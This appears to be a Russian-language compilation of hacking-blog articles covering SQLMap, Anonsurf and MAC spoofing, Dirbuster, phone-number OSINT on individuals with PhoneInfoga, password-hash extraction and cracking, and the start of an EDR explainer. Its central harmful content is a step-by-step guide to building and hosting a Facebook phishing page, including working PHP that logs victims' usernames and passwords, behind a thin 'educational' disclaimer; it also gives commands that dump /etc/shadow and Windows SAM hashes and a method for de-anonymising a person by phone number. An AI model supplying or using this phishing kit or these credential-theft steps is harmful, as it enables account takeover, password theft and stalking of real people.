Взлом Android с помощью Metasploit и Msfvenom

Lynis — лучший инструмент безопасности Kali Linux

SQLMap: руководство по безопасности ваших данных


В постоянно меняющемся мире кибербезопасности крайне важно оставаться на шаг впереди потенциальных угроз. Встречайте SQLMap — мощный инструмент тестирования на проникновение с открытым исходным кодом, предназначенный для выявления и использования уязвимостей, связанных с внедрением SQL-кода. В этом руководстве вы узнаете об эффективной защите ваших данных.



Установка
Вы можете легко установить SQLMap в Kali Linux, выполнив следующие действия:

Откройте терминал: запустите окно терминала в вашей системе Kali Linux.

Обновите список пакетов: рекомендуется всегда обновлять список пакетов, выполнив следующую команду:

sudo apt update
После обновления списка пакетов вы можете установить SQLMap с помощью следующей команды:

sudo apt install sqlmap
Проверка установки: после завершения установки вы можете убедиться, что SQLMap успешно установлен, выполнив следующую команду:

sqlmap --version




SQLMap установлен и готов к использованию.

Возможности SQLMap
Прежде чем мы углубимся в практические аспекты, давайте познакомимся с впечатляющим набором функций, которые выделяют SQLMap среди прочих инструментов.

Автоматическое сканирование: SQLMap упрощает процесс сканирования веб-приложений на наличие уязвимостей SQL-инъекций. Это достигается за счет автоматического анализа параметров, что значительно сокращает количество манипуляций, необходимых для обнаружения уязвимостей.
Базы данных: SQLMap умеет определять тип и версию системы управления базами данных (СУБД). Будь то MySQL, PostgreSQL или Microsoft SQL Server, SQLMap может точно его идентифицировать.
Извлечение данных: выходя за рамки простого обнаружения, SQLMap превосходно справляется с извлечением данных из базы данных. Это позволяет извлекать конфиденциальную информацию, хранящуюся в базе данных.
Обход аутентификации: В определенных сценариях SQLMap можно использовать для обхода механизмов аутентификации, предоставляя несанкционированный доступ к приложению. Это наглядно подчеркивает важность надежных протоколов аутентификации.
Постэксплуатация: Кроме того, SQLMap расширяет свои возможности за пределы обнаружения уязвимостей, позволяя тестировщикам выполнять команды операционной системы на сервере, на котором размещена база данных. Это, в свою очередь, усиливает острую потребность в надежной безопасности серверов.
Настройка: SQLMap дает пользователям возможность настраивать свои тесты, указывая опции. Это гарантирует, что инструмент легко адаптируется к широкому спектру приложений и сценариев тестирования.
Раскрытие потенциала SQLMap
Теперь давайте более подробно рассмотрим возможности SQLMap, изучив его практическое использование:

Оценка уязвимостей: SQLMap служит важным инструментом для выявления уязвимостей внедрения SQL в приложениях и на сайтах. Имитируя атаки, он помогает тестировщикам выявить потенциальные слабости, которыми могут воспользоваться злоумышленники. Более того, он предлагает незаменимый ресурс для оценки безопасности.

Тестирование безопасности баз данных: Организации могут использовать SQLMap для оценки безопасности своих баз данных. Заблаговременно выявляя и устраняя уязвимости, они могут усилить свои меры защиты данных. Более того, SQLMap обеспечивает комплексный подход к защите конфиденциальной информации.

Основные команды SQLMap
Теперь давайте рассмотрим некоторые команды SQLMap и их использование:

Базовое сканирование
Представьте, что вы тестируете страницу входа сайта по адресу «http://example.com/login.php» с параметрами «admin» и «password». Чтобы запустить базовый тест внедрения SQL, вы должны использовать следующую команду:

sqlmap -u "http://example.com/login.php?user=admin&password=test"





SQLMap автоматически обнаружит параметры и оценит URL-адрес на наличие уязвимостей SQL-инъекций.

Отпечатки базы данных
Предположим, вы исследуете страницу по адресу «http://example.com/product.php» с параметром «id». Вы подозреваете, что он уязвим для SQL-инъекций, и хотите указать СУБД как MySQL. Тогда вам нужно использовать эту команду:

sqlmap -u "http://example.com/product.php?id=1" --dbms=MySQL
Извлечение данных
Допустим, вы успешно воспользовались уязвимостью SQL-инъекции на странице поиска «http://example.com/insecure_search.php» с параметром «query». Если вы хотите извлечь данные из базы данных, используете следующую команду:

sqlmap -u "http://example.com/insecure_search.php?query=test" --dump
SQLMap продолжит извлечение данных, предоставляя вам конфиденциальную информацию, хранящуюся в базе данных. Вы тестируете страницу входа по адресу «http://example.com/login.php», защищенную аутентификацией BASIC. Чтобы попытаться обойти аутентификацию во время тестирования, используйте следующую команду:

sqlmap -u "http://example.com/login.php" --auth-type=BASIC
SQLMap попытается обойти механизмы аутентификации BASIC.

Постэксплуатация
Представьте, что вы обнаружили уязвимость SQL-инъекции на странице «http://example.com/injectable_page.php» с параметром «param». После успешной эксплуатации вы хотите получить доступ к интерактивной оболочке операционной системы:

sqlmap -u "http://example.com/injectable_page.php?param=test" --os-shell
Он предоставит вам интерактивную оболочку на сервере, на котором размещена база данных.

Вы тестируете страницу поиска по адресу «http://example.com/search.php» с параметром «query». Чтобы настроить полезную нагрузку для тестирования SQL-инъекций, используйте в качестве примера следующую команду:

sqlmap -u "http://example.com/search.php?query=test" --data="query=test' OR '1'='1'"
Конфигурационный файл
Предположим, у вас есть HTTP-запрос, сохраненный в файле с именем «request.txt», который вы хотите использовать для тестирования. Вы можете использовать этот файл запроса с помощью следующей команды:

sqlmap -r request.txt




Инструмент будет использовать файл запроса для запуска тестов, что полезно для сложных сценариев тестирования.

Расширенные настройки
Допустим, в рамках тонкой настройки процесса тестирования вы хотите установить тайм-аут 10 секунд для HTTP-запросов. Вы можете использовать эту расширенную опцию:

sqlmap --timeout=10
Это позволит настроить продолжительность тайм-аута для HTTP-запросов до 10 секунд.

Заключение
В эпоху, когда киберугрозы поджидают на каждом шагу, SQLMap выступает в качестве мощного союзника, повышающего безопасность сайтов и баз данных. Более того, освоив его функции и тщательно соблюдая принципы этического использования, вы сможете активно способствовать созданию более безопасной цифровой среды.

Как сохранить анонимность в интернете

Какие следы в интернете вы оставляете, а главное, что можно по ним узнать? Гораздо больше, чем вы думаете. Любая собранная информация может быть использована для идентификации вашей личности. Чтобы этого избежать, мы подготовили для вас два инструмента, которые помогут замести следы, обеспечив безопасность в сети.



Инструменты для анонимности в сети
Anonsurf — это инструмент для изменения IP-адреса в Kali Linux, разработанный командой Parrot Sec. Он работает в фоновом режиме, постоянно меняя ваш IP-адрес, чтобы вы оставались анонимными. Anonsurf использует два основных сервиса для обеспечения анонимности в Интернете. Один из них — Tor, а другой — iptables, служба Linux для управления IP-адресами. Он имеет открытый репозиторий на Github.

Macchanger — это встроенный инструмент Kali Linux, который может изменить ваш Mac-адрес. Он имеет множество функций для сохранения вашей анонимности.

Итак, приступим к установке и настройке Anonsurf и Macchanger в Kali Linux.

Как изменение IP и Mac-адреса делают вас анонимными
Ваш IP и MAC-адреса — это уникальные идентификаторы, по которым можно вас найти. Ваши системные данные, а также местоположение можно отслеживать с помощью ваших адресов. Таким образом, когда вы измените свой Mac и IP-адреса, вас не получится деанонимизировать.

Установка Anonsurf
Шаг 1. Откройте терминал в Kali Linux и используйте следующую команду, клонирующую репозиторий Anonsurf из Github:

git clone https://github.com/Und3rf10w/kali-anonsurf.git




Шаг 2. Измените каталог и дайте разрешения anonsurf. Вы можете сделать это с помощью следующих команд:

cd kali anonsurf
****d +x ./installer.sh
Шаг 3. Запустите сценарий anonsurf:

sudo ./installer.sh




Шаг 4. Теперь начнется установка и будут установлены зависимости.

Шаг 5. После завершения установки введите команду help, чтобы получить список всех возможных опций инструмента:

anonsurf help




Шаг 6. Теперь запустите службу Anonsurf:

anonsurf start
Поздравляем, ваш IP-адрес скрыт. Теперь изменим MAC-адрес вашей системы.




Установка Macchanger
Шаг 1. Выключите сетевую карту. Используйте следующую команду Linux, чтобы отключить сетевую карту:

ifconfig device down
Используйте команду ifconfig, чтобы найти имя вашего устройства.

Это будет либо eth0,eth1 или wlan0, wlan1 и т. д.

Шаг 2. Установите случайный MAC-адрес:

macchanger -r eth0





Как видно на изображении выше, Mac-адрес был изменен.

Чтобы проверить все команды, используйте опцию справки:

macchanger -h
Примечание: Постоянный MAC-адрес будет восстановлен после перезагрузки.




Шаг 3. Включите сетевую карту:

ifconfig eth0 up
Шаг 4. Восстановите Mac-адрес по умолчанию. Если вы хотите восстановить ваш MAC-адрес, используйте следующие команды:

macchanger –p eth0
Шаг 5. Подмена Mac-адреса.




Вы можете подделать MAC-адрес, используя следующую команду:

macchanger -m [Spoofing MAC Address] eth0
macchanger -m XX:XX:XX:XX:XX:XX eth0
Здесь XX:XX:XX:XX:XX:XX следует заменить на целевой MAC-адрес.

Если вы получили следующую ошибку:

ОШИБКА: Невозможно изменить MAC: интерфейс включен или нет разрешения: невозможно назначить запрошенный адрес.

То вам нужно отключить сетевой интерфейс, а затем изменить MAC-адрес, введя команду:

ifconfig wlan1 down
Теперь вы полностью анонимны, поскольку ваш IP и MAC адреса скрыты.

Dirbuster: ваш ангел-хранитель в мире кибербезопасности

В бесконечном противостоянии с киберугрозами инструмент под названием Dirbuster выступает грозным оружием. В этой статье мы окунемся в мир Dirbuster, раскрыв все его секреты и потенциал для защиты вашего цифрового мира.




Скрытые угрозы
Прежде чем мы раскроем возможности Dirbuster, давайте признаем зловещую реальность цифрового мира. Каждый день хакеры и злоумышленники рыскают в поисках уязвимостей, подобно призрачным хищникам, которые скрываются в темных уголках киберпространства, затаившись в ожидании идеального момента для удара.

Каждый пользователь обязан сохранять бдительность, чтобы не стать жертвовать злоумышленников. Одним из фундаментальных принципов кибербезопасности является обеспечение защиты ваших данных от взломов. Именно здесь в игру вступает Dirbuster.

Dirbuster: на страже вашего сайта
Этот мощный инструмент предназначен для проведения разведки сайтов, помогая обнаружить скрытые каталоги и файлы. Интрумент неустанно сканирует ваш веб-сервер, выявляя потенциальные уязвимости до того, как злоумышленники смогут ими воспользоваться.

Dirbuster работает по простому, но эффективному принципу – перебор каталогов и файлов. Он отправляет на целевой веб-сервер шквал запросов, пробуя разные имена каталогов и файлов. Когда он находит совпадение, он предупреждает вас о наличии уязвимостей.

Принцип работы Dirbuster
Начать работу с Dirbuster очень просто. Во-первых, он имеет открытый исходный код, а во-вторых, совместим с различными платформами. Следовательно, вы можете быстро загрузить его и начать сканирование своего сайта в течение нескольких минут.

Одной из сильных сторон Dirbuster является его универсальность. Он позволяет вам настраивать списки слов и расширения, которые вы хотите использовать во время сканирования. Это означает, что вы можете адаптировать сканирование Dirbuster к вашим конкретным потребностям.

Установка Dirbuster
Давайте перейдём к процессу установки. Dirbuster — это инструмент на основе Java, поэтому вам необходимо иметь в вашей системе Java (JRE).

Шаг 1. Установите Java

Если у вас не установлена Java, вы можете загрузить ее с официального сайта Oracle или использовать OpenJDK, популярную альтернативу с открытым исходным кодом.

Шаг 2. Загрузите Dirbuster

Вы можете загрузить инструмент с официального сайта. Убедитесь, что вы скачиваете последнюю версию, обычно предоставляемую в виде файла JAR (архив Java).

Шаг 3. Запустите Dirbuster

После загрузки JAR-файла Dirbuster вы можете запустить его с помощью следующей команды в своем терминале:

java -jar DirBuster-0.12.jar
Замените DirBuster-0.12.jar настоящим именем загруженного вами JAR-файла Dirbuster.

Использование Dirbuster: пошаговое руководство
Теперь, когда у вас есть этот инструмент, давайте посмотрим, как вы можете его использовать.





Шаг 1. Укажите целевой URL-адрес

Чтобы начать сканирование, вам необходимо указать целевой URL-адрес. После -u напишите URL-адрес:

java -jar DirBuster-0.12.jar -u http://пример.com
Шаг 2. Выберите список слов

Выберите список слов для сканирования, используя -l, за которым следует путь к файлу списка слов. Dirbuster предоставляет список слов по умолчанию, но вы также можете создавать собственные словари для настройки сканирования:

java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt
Шаг 3. Запустите сканирование

Чтобы начать сканирование, добавьте -r. Это говорит о том, что инструмент будет исследовать каталоги и файлы:

java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt -r






Дополнительные команды
Dirbuster предлагает несколько дополнительных команд для улучшения сканирования:

1. Сканирование методом перебора: добавьте -b для сканирования методом перебора:

java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt -r -b
2. Выбор протокола: чтобы указать протокол, отличный от HTTP, используйте -p:

java -jar DirBuster-0.12.jar -u ftp://пример.com -l /path/to/словарь.txt -r






3. Сортировка расширений: для сортировки по расширениям используйте -x:

java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt -r -x php,html
Заключение
Dirbuster помогает выявлять и устранять уязвимости до того, как злоумышленники смогут ими воспользоваться. Заблаговременно обнаруживая скрытые каталоги и файлы, он укрепляет защиту вашей цифровой крепости и позволяет оставаться на шаг впереди потенциальных угроз. Не ждите, пока станет слишком поздно. Загрузите Dirbuster уже сейчас, чтобы начать сканирование своего сайта.

Как обнаружить скрытый Wi-Fi с помощью NetSpot

OSINT: пробиваем человека по номеру телефона

[IMG][/IMG]


OSINT или сбор информации из открытых источников становится все более популярным способом узнать о человеке ценную информацию. С широким распространением смартфонов и интернета номера телефонов стали ключевым идентификатором, который может быть использован для раскрытия огромного количества информации о пользователе. В статье расскажем об инструменте PhoneInfoga, с помощью которого OSINT по номеру телефона станет проще, чем когда-либо. Поехали!
[IMG][/IMG]

Анализ телефонных номеров
Одним из первых шагов при проведении OSINT по номеру телефона является сбор следующей информации: оператор связи, местоположение и тип линии. Анализируя эти данные о телефоне, вы можете получить важную информацию о привычках человека, например о том, где он живет и работает. Найти информации по номеру телефона можно разными способами: вручную используя поисковики, телеграм-боты для пробива, сервисы типа TrueCaller и с помощью специальных утилит. Об одной из таких мы поговорим далее.

Социальные сети

Номера телефонов также можно использовать для раскрытия личности человека в социальных сетях. Путем поиска номера телефона на таких платформах, как VK, Facebook, Instagram, можно идентифицировать учетные записи человека в социальных сетях. Как только личность будет деанонимизирована, вы сможете собрать дополнительную информацию об онлайн-активности и интересах человека.

Государственные архивы

Номера телефонов также можно использовать для поиска в общедоступных записях. Например, для поиска судебных протоколов, записей о собственности и других юридических документов. Это может дать ценную информацию о финансовом положении и других аспектах личной и профессиональной жизни.

Пробив по номеру с помощью PhoneInfoga
PhoneInfoga — один из самых продвинутых инструментов для анализа телефонных номеров с использованием бесплатных ресурсов. Цель состоит в том, чтобы сначала собрать стандартную информацию, такую ​​как страна, область, оператор и тип линии, по любым международным телефонным номерам с очень хорошей точностью. Затем найти следы в поисковых системах, которые могут привести к владельцу. PhoneInfoga использует платформы с открытым исходным кодом, их API-интерфейсы и даже инструменты Google для получения значимой и актуальной информации о номере телефона. PhoneInfoga автоматизирует этот процесс и это очень облегчает поиск.

Установка PhoneInfoga на Kali Linux
Прежде всего, вам нужно клонировать его, а затем установить все зависимости.
Установите с github:
git clone https://github.com/sundowndev/PhoneInfoga.git
Зайдите в папку с утилитой:
cd PhoneInfoga/
Сделайте его исполняемым:
****d +x phoneinfoga.py
Установите requirements
python3 -m pip install -r requirements.txt
Запустите:
python3 phoneinfoga.py --help

https://i.gyazo.com/cbe234633e334e05...520b8d3be1.jpg
Всего 7 флагов.

-h - Справка.
--help
-n - Вводить номер телефона для сканирования.
--number
-i - Использовать файл с несколькими номерами.
--input
-o - Сохранить результат сканирования.
--output
-s - Сканировать.
--scanner
--osint - Использовать осинт.
-u - Обновить утилиту.
--update
Протестируем утилиту.

В качестве теста, мы будем использовать номер: 88005553535.

Российские номера указываются в формате +7. Для иностранных номеров: +код страны.

Использование флага -n.
python3 phoneinfoga.py -n +78005553535



Использование флага --osint и -s.
python3 phoneinfoga.py -n +78005553535 -s all --osint

[IMG][/IMG]
Далее интрумент запросит, хотите ли вы искать отпечатки. Ответ положительный.

[IMG][/IMG]
После этого в игру вступает Google. Но, чтобы увидеть результаты поиска, вам нужно пройти капчу.

https://i.gyazo.com/68b89c8a32a65dfe...28daf19b7b.png
Нажмите на выделенную ссылку и отправляйтесь в ваш браузер. Пройдите капчу и нажмите F12. Кликните по вкладке Хранилище (Storage), вкладка куки (Cookies). Там найдите большими бувами GOOGLE_ABUSE_EXEMPTION. Теперь вам нужны те cookies, где есть значение ID=.

[IMG][/IMG]
Скопируйте вместе с ID= и вставьте в ваш терминал. Жмите Enter. И поиск продолжится.

Помимо этого, вы можете добавить соц.сети в утилиту. Для этого используйте команду:

Зайдите в папку osint.
cd osint/

[IMG][/IMG]

Вы увидите файл social_medias.json. Отредактируйте его следующим образом:

[IMG][/IMG]

Скопируйте сегмент от первой фигурной скобки до такой же замыкающей. Поставьте запятую после крайней замыкающей скобки, вставьте скопированное и напишите желаемое имя домена вместо указанного. После крайней замыкающей красной скобки, запятую уже не ставьте. Сохраните.

Теперь Phoneinfoga полностью настроен и готов к работе.

Заключение
OSINT по номеру телефона становится все более популярным методом пробива в последние годы из-за широкой доступности данных в интернете. Однако, важно отметить, что этот метод не лишен ограничений. Например, некоторые пользователи могут иметь незарегистрированные номера телефонов или предпринимать иные шаги по сокрытию своей личной информации в сети. Кроме того, точность и надежность онлайн-источников данных могут сильно различаться. Чтобы преодолеть эти ограничения, вы можете использовать комбинацию методов, которую предоставляете утилита Phoneinfoga. Тогда OSINT по номеру телефона сможет стать поистине эффективным методом сбора информации о человеке.

Как создать фишинговую страницу для взлома Facebook

Хотите узнать, как хакеры создают фишинговую страницу для взлома? Мы покажем вам два метода: один — простой для новичков, которые хотят просто протестировать взлом, а второй — для тех, кто хочет научиться взлому и пентесту, а также создать свою собственную фишинговую страницу Facebook.



Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Простой способ взлома
Загрузите файлы взлома: для мобильных телефонов и для компьютеров (лучше отдать предпочтение ПК)
Бесплатный хостинг: 000webhost. При желании вы можете использовать любой хостинг, но в этой статье мы будем использовать именно этот.
Как создать фишинговую страницу Facebook
Шаг 1. Перейдите на сайт 000webhost и нажмите «Зарегистрироваться», используя любой адрес электронной почты (это БЕСПЛАТНО). Очень важно подтвердить свой адрес электронной почты, чтобы ваша учетная запись была активной.




Шаг 2. В конце регистрации установите пароль и выберите название сайта, подходящее для вашей фишинговой страницы.

Шаг 3. После проверки вашего адреса электронной почты выберите «Диспетчер файлов», а затем нажмите «Загрузить файлы сейчас».

Шаг 4. Теперь вы будете перенаправлены на файловый менеджер вашего сайта, как показано ниже:



Шаг 5. Откройте папку public_html. Загрузите оба файла index.html и post.php, нажав значок загрузки в правом углу файлового менеджера.

Шаг 6. Перейдите к списку сайтов на панели и скопируйте адрес ссылки на свой сайт, который вы ранее создали. «Домен, который был создан хостингом».

Шаг 7. Как только целевой пользователь войдет на сайт, вы увидите в файловом менеджере следующий файл с именем username.txt. Откройте его, чтобы увидеть логин и пароль учетной записи.




Готово, вы успешно научились взламывать аккаунт Facebook с помощью фишинга.

А теперь покажем продвинутый метод для тех, кто хочет изучить все технические детали взлома Facebook вручную.

Продвинутый способ взлома
Сейчас вы узнаете, как создавать собственную фишинговую страницу Facebook вручную.

Шаг 1. Откройте facebook.com. Чтобы создать фишинговую страницу, перейдите на официальный сайт Facebook и щелкните правой кнопкой мыши пустую область. Вы увидите множество опций, вам нужно нажать на опцию просмотра исходной страницы.

Шаг 2. Создание копии страницы Facebook. Когда вы нажмете на просмотр исходного кода страницы, откроется новая вкладка, показывающая весь код. Это исходный код страницы Facebook.



Сейчас мы будем его редактировать для создания фишинговой страницы Facebook. Для этого: выделите весь код, скопируйте и вставьте его в блокнот и сохраните файл как index.htm. Расширение файла — .htm, а не .html. Не допускайте этой ошибки.

Шаг 3. Отредактируйте исходный код. Теперь откройте блокнот, в который вы вставили этот код, нажмите CTRL+F и введите ACTION в строке поиска. Далее найдите следующую строку в коде:

action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
Когда вы найдете код, указанный выше, удалите всё после слова action и замените словом post.php, как показано ниже:

action="post.php"
Шаг 4. Сохраните код в новую папку с именем index.htm. Итак, вы завершили первую часть фишинговой страницы.

Шаг 5. Создание файла PHP. Чтобы создать вторую часть фишинговой страницы Facebook, вам необходимо создать файл PHP. В качестве примера мы будем использовать наш файл под названием post.php. Если вы планируете использовать другое имя, обязательно измените его и в index.htm. Откройте новый файл блокнота, скопируйте приведенный ниже код и сохраните его под именем post.php.

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Шаг 6. Сохраните фишинговые файлы Facebook вместе.Теперь вы успешно создали два файла, которые следует сохранить в одной папке.

index.htm
post.php
Шаг 7. Создайте учетную запись на бесплатном хостинге. Перейдите на сайт 000webhost и нажмите кнопку «Зарегистрироваться», используя любой адрес электронной почты. Очень важно подтвердить свой адрес электронной почты, чтобы ваша учетная запись была активной.

Шаг 8. Откройте файловый менеджер и загрузите файлы. После откройте Cpanel на панели управления вашего хостинга. Выберите файловый менеджер и нажмите «Диспетчер файлов», чтобы перейти в папку public_html.

Шаг 9. Загрузите index.htm и post.php. Нажмите кнопку «Загрузить файлы» и загрузите оба файла, которые вы ранее сохранили.

Шаг 10. Убедитесь, что все фишинговые файлы загружены, а затем откройте свой сайт. Перед вами будет обычная, на первый взгляд, страница Facebook, но когда вы увидите URL-адрес, вы поймете, что это фишинговая страница.

Шаг 11. Перейдите к списку сайтов на панели и скопируйте адрес ссылки на свой сайт, который вы ранее создали.

Шаг 12. Как только целевой пользователь войдет на сайт, вы увидите в файловом менеджере файл с именем username.txt. Откройте его, чтобы узнать логин и пароль.

Поздравляем, вы научились взламывать аккаунт Facebook с помощью собственной фишинговой страницы.

Сегодня вы узнали не только, как хакеры взламывают Facebook и другие учетные записи социальных сетей с помощью фишинговых URL-адресов, но и посмотрели на этот процесс с изнанки. Надеемся, что статья оказалась полезной для вас. Обязательно проверяйте URL-адреса, прежде чем переходить по каким-либо ссылкам. На этом все. Удачи!

Что такое хэширование: извлекаем хэши паролей с помощью ОС Windows и Linux

Большинство начинающих пентестеров не понимают, как извлекать хэши паролей. Однако, извлечение заветных хешей — это далеко не все, что нужно знать перед тем, как начинать взлом. Также необходимо разобраться, что вообще из себя представляет хэширование паролей. В этом руководстве мы подробно расскажем как происходит взлом любых паролей с технической стороны. Готовы? Тогда поехали!


Что такое хэширование паролей
Процесс хеширования используется для хранения паролей и конфиденциальных данных на компьютерах, тем самым обеспечивая безопасность данных. Проще говоря, большинство сайтов используют алгоритм хеширования для шифрования и управления паролями. Для наглядности давайте посмотрим на следующие примеры хэшей:

хэш(«привет»)=2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824
хэш("пьивет")=58756879c05c68dfac9866712fad6a93f8146f337a69afe7dd238f3364946366
Мы специально показали, как выглядят хэши на примере двух слов «привет», за исключением того факта, что второе слово написано с опечаткой в 1 букву. Результат получился совсем иным, не так ли? Таким образом, можно сделать вывод, что если входные данные изменятся хотя бы на один бит, хэш в конченом итоге будет совершенно другим, как вы можете увидеть на примере выше.

А теперь давайте посмотрим, как выглядит процесс регистрации учетной записи на основе хэша.

В качестве примера возьмем ВКонтакте. При создании нового аккаунта нужно заполнить поля, содержащие информацию о вашем имени, email, номере телефона, дате рождения, а также придумать пароль. После того, как вы нажали «зарегистрироваться», ваши данные уходят в серверную базу данных ВКонтакте, в которой ваше имя, email, номер телефона, дата рождения сохраняются в первоначальном виде.

А как же пароль? В базе данных сайта пароль никогда не хранится в виде открытого текста. Ваш пароль представляет собой исходные данные для алгоритма хэширования, на выходе которого мы получаем пароль в зашифрованном виде. Зашифрованный пароль может показаться набором случайных букв и цифр, но это не так. Хэш пароля хранится в базе данных Вконтакте. Это означает, что введенный вами пароль будет хранится в базе данных не в открытой, а в зашифрованной форме, доступа к которой у злоумышленников не будет.

Итак, что будет делать хакер теперь?
Получение хэшей паролей Linux
В операционной системе Linux теневой файл хранит хэшированные и защищенные пароли. Кроме того, вы не можете просматривать файлы напрямую, как обычные файлы.

Чтобы получить доступ к скрытым хэшам, введите следующую команду:

unshadow /etc/passwd /etc/shadow > crack.txt
unshadow — это команда Linux, которая извлекает хэши паролей. Как вы можете видеть, хэши будут сохранены в файле Crack.txt.

Извлечение хэшей паролей Windows
Pwdump — это потрясающий инструмент для взлома, который может помочь вам получить хэши секретных паролей LM и NTLM учетных записей.

Загрузите pwdump на компьютер с Windows. Мы покажем на примере pwdump7. Так, просто используя этот инструмент, мы можем получить хэши паролей Windows из базы данных SAM.

Откройте терминал и введите следующую команду в каталоге pwdump7.

pwdump7 > hash.txt
Программа извлекает и сохраняет хэши в файле с именем hash.txt.

Итак, хакеры извлекли хэши, но не смотря на это они не смогут зайти в аккаунты пользователей, так как полученный ими пароль зашифрован. Если хакер попробует зайти в аккаунт пользователя с помощью хэша пароля, доступ в аккаунт открыт не будет. Для доступа необходима ввести пароль в форме текста.

Следующим шагом будет использование Hash Identifier или John the Ripper, о котором мы расскажем в следующей части.

Извлекаем хэши паролей с помощью John The Ripper




Вступить в наш чат[/CENTER]
Большинство начинающих пентестеров не понимают, как извлекать хэши паролей. И поэтому сегодня мы расскажем, как это сделать с помощью инструмента John The Ripper.



В прошлой статье мы говорили о том, что такое хэширование. Если вы еще не читали её, то советуем начать именно с неё. А теперь давайте коротко вспомним, что означает этот термин.

Хэширование – это процесс преобразования данных (в нашем случае паролей) в зашифрованную строку для обеспечения безопасности. Хэш - это набор случайных символов, который генерируется на основе текстового пароля с помощью специального алгоритма хэширования, что позволяет защитить пароль от взлома и улучшить его безопасность. Даже если злоумышленник получит доступ к базе данных паролей, он не сможет прочитать их в открытом виде и использовать для входа в систему. Так как же все-таки расшифровать полученные хэши? Что ж, у Джонни есть ответ, который вам нужен.

Установка
Представляем Johnny — кроссплатформенный графический интерфейс с открытым исходным кодом для популярного взломщика паролей John the Ripper, который доступен в Kali Linux. Но вы также можете установить его и в Windows, для этого просто скачайте программу установки с официального сайта.

Цель Джонни — автоматизировать и упростить взлом паролей с помощью универсального инструмента John the Ripper, а также добавить к нему дополнительные функции, в том числе и удобный графический интерфейс, а еще множество атак и улучшенный рабочий процесс хэширования.

Далее вам понадобится установочный файл John the Ripper, который вы можете скачать здесь. Теперь откройте и установите Джонни, как и любое другое приложение. Как только вы закончите с этим, вам нужно настроить инструмент. Для этого распакуйте John the Ripper в папку.

Используйте настройки, чтобы соединить Джона Потрошителя и Джонни вместе.



Теперь, когда оба инструмента подключены друг к другу, мы можем приступить к взлому хэшей паролей.

В этом демонстрационном руководстве мы будем использовать список DEFCON, содержащий хэшированные пароли, которые нам нужно взломать. Он имеет более 50 000 паролей учетных записей, которые мы взломаем менее чем за 2 часа.

Итак, поехали!

Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Шаг 1. Импортируем хэши

Запустите Johnny и импортируйте хэши с помощью опции для открытия файла паролей.

Шаг 2. Ищем список слов

Загрузите хороший словарь из Интернета. Мы будем использовать список слов из двух миллиардов возможных паролей, который вы можете скачать отсюда.

Шаг 3. Выбираем список слов

Перейдите в раздел «Wordlist» и выберите загруженный список слов.

Шаг 4. Выбираем типа хэша

Теперь по умолчанию для взлома будет автоматически выбран наиболее часто используемый тип хэша - sha1, но вы также можете настроить тип вручную. После нажмите «Начать атаку», и должен начаться взлом пароля.





Шаг 5. Меняем тип хэша

После того, как вы взломали все возможные хэши одного типа, нужно ввести другой тип хеша и снова продолжить взлом.

Наберитесь терпения. В нашем случае на взлом 50.000 паролей ушло 2 часа. Но если у вас более мощный компьютер, то получится и быстрее.

Так как же все это работает?

Что ж, происходит следующее: Джонни автоматизировал процесс взлома паролей и, используя наш список слов, начал сравнивать хэши паролей с хэшами, присутствующими в списке задач. Стоит отметить, что пароли были далеко не из простых, но тем не менее, мы их смогли легко взломать. Иначе говоря, если у вас есть надежный список слов, то вы можете взломать практически любой пароль.

Как защитить свой пароль от взлома
Остерегайтесь фишинговых атак;
Используйте двухфакторную аутентификацию для всего, чем вы только пользуетесь;
Создайте пароль длиной не менее 12 символов. Чем больше пароль, тем сложнее его взломать;
Проверьте, не была ли когда-либо скомпрометирована ваша электронная почта. Для этого зайдите на этот сайт.
Будьте бдительны и совершенствуйте свои знания, читая наши статьи.

EDR — обнаружение и реагирование на угрозы конечных точек

Каждый день пользователи сталкиваются с различными киберугрозами, поскольку злоумышленники находят новые способы атак. Это требует надежных мер безопасности, и одним из главных решений является обнаружение и реагирование на угрозы конечных точек (EDR). EDR служит важнейшим щитом против угроз, отслеживая и быстро реагируя на потенциальные опасности, скрывающиеся в конечных точках.





Что такое конечные точки
Конечные точки — это физическое оборудование, которое подключается к сетевой системе. Это могут быть мобильные устройства, настольные компьютеры, виртуальные машины, встроенная аппаратура или серверы. Средства обеспечения безопасности конечных точек помогают защитить их от злоумышленников и уязвимостей.

Киберпреступники выбирают конечные точки для атак, поскольку они позволяют получить доступ к личным данным. Они находятся за пределами сетевого периметра безопасности, и за их защиту отвечают пользователи, которые часто допускают ошибки. Защита конечных точек от атак имеет первостепенное значение, и за нее отвечает EDR.

Что такое EDR
EDR или Endpoint Detection and Response (в переводе с англ. обнаружение и реагирование на угрозы конечных точек) — важнейшее решение в области кибербезопасности, предлагает непрерывный мониторинг и защиту от различных угроз, нацеленных на конечные точки. Эти угрозы охватывают широкий спектр: от вредоносного программного обеспечения и программ-вымогателей до фишинга и сложных эксплойтов нулевого дня.

EDR анализирует данные, собранные с различных устройств, таких как компьютеры, ноутбуки, серверы и мобильные устройства, быстро выявляя любые подозрительные действия и реагируя на них.

Основные функции EDR
По своей сути EDR выполняет три важные функции:

Сбор данных: EDR постоянно собирает данные с конечных точек, анализируя информацию об активности файлов, сетевых подключениях и т.д.. Эти данные составляют основу возможностей EDR по обнаружению и реагированию.
Обнаружение угроз: EDR использует передовые методы, включая машинное обучение, поведенческий анализ и анализ угроз для выявления закономерностей, указывающих на потенциальные угрозы. Сюда входит обнаружение известных вредоносных программ, программ-вымогателей, фишинга и эксплойтов нулевого дня.
Автоматизированный ответ: при обнаружении угрозы EDR может предпринять автоматические действия для устранения угрозы. Эти действия могут включать изоляцию зараженной конечной точки, помещение вредоносных файлов в карантин или даже полное удаление угрозы.
Механизмы обнаружения EDR
EDR использует различные механизмы для выявления и классификации потенциальных угроз:

